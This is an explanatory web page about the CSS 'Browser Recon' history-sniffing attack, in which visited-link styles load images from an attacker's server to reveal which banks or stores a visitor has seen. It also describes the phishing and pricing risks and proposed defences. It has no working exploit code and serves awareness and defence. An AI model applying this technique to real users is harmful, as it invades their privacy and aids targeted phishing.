Guessing Your Bank

Do you use an online bank? Have you ever received a phishing email from a bank? If it were your bank, would you be more likely to believe it? Most people would. Researchers Markus Jakobsson, Tom N. Jagatic and Sid Stamm have identified a method that phishers might use to detect which bank you use. This attack, which they call a Browser Recon attack, can be employed by any web site to make guesses at your browsing history. Using a simple trick, any site can query your browser and find out which sites you have visited.

The Underlying Technology

Cascading Style Sheets (CSS) is a technology employed by a vast range of websites to make the site attractive; CSS can be used to set the shape and size of text or images, as well as rearrange things on the page. In fact, this web page uses CSS to underline the section headings. One common use of CSS is to color visited links differently than unvisited links. Often, this is intended as a visual cue to someone reading a page, so they know which links they have already followed.

Another feature of CSS allows it to load images. This image is loaded using CSS code, namely background:url('img.jpg'). This feature is usually used to layer pictures and text on top of each other.

A different background can be loaded for visited and unvisited links; moreover, a different background can be loaded for each visited or unvisited link. A web programmer could set up a website that does just that, except loads the images from his server. Since he owns the server, he can keep track of which images are requested and determine which of the links each visitor has previously seen!

Why does this matter?

Knowing who you bank with: This is really scary if the web programmer happens to be an evil phisher. He can find out which bank websites you've seen and then make his site look like your bank's -- no matter who your bank is. Since people are more likely to believe phishing sites or emails that look like their specific bank, this type of attack is particularly vicious.

Personalized content: Online stores can use this technique to see whether or not a you have been to the competition's website. If you've been to a book store's competitor site, they may be inclined to lower their prices; on the other hand, if you haven't, they might try to charge you more! This means you could be viewing different prices depending on where you've been browsing.

Would Phishers Really Use Browser-Recon?

Yes. It is a very simple attack to sniff someone's browsing history, and it does not take very long to implement. The most time consuming part is selecting which URLs to guess. Once that is complete, listing them and invading browsers only takes moments. 300 sites can easily be checked in just a few seconds.

How can we stop these browser-recon attacks?

This is not a new vulnerability, and it is not likely to be fixed by the people who designed CSS since the features are too valuable. Following are a few solutions that have been proposed, but a simple complete solution is to operate a browser with caching, history and bookmarks (or favorites) completely disabled; then there's no information to be "sniffed!"

Isolate each site (a client-side solution): If your browser only allows a site, say http://bank.com to see where you've been within the bank.com domain, they will have no idea what other sites you've been to. Jackson et. al of Stanford have been working on SafeHistory, a browser plugin that will isolate all the sites. This may cause unwanted side-effects, however. If you have a portal web page you regularly visit with a list of links (to newspapers, search engines, friends sites, etc) that you want to follow, it might be useful to know which ones you've already seen. Unless all the links point to the same site hosting your portal, this plugin will make them always seem unvisited.
Make the links hard to guess (a server-side solution): Professor Markus Jakobsson and PhD student Sid Stamm have come up with a solution that makes the URLs really hard to guess. Since an attacker has to list the URLs he wants to test, if they have random numbers embedded, an attacker would have to guess all the random numbers too. For example, if two-digit random numbers (0-99) are included in http://www.guess.me/[random number] then an attacker would have to try http://www.guess.me/1, with a 2, with a 3, all 100 different URLs. Imagine if it was a 100-digit number! Then you'd have to try too many (1 followed by 99 zeros) different numbers! Even on the fastest computers, this would take years.

Additional Information

http://browser-recon.info: A site, complete with a demo, describing the technical details of browser-recon and showing how it works.
Stanford SafeHistory: A project that enforces same-origin on browser history
An academic paper (pdf 572kb) by Markus Jakobsson and Sid Stamm with a deeper description of the problem and the random-number solution.
Markus Jakobsson: Researches phishing and countermeasures at Indiana University.
Sid Stamm: Also researches phishing and social aspects of web privacy at Indiana University.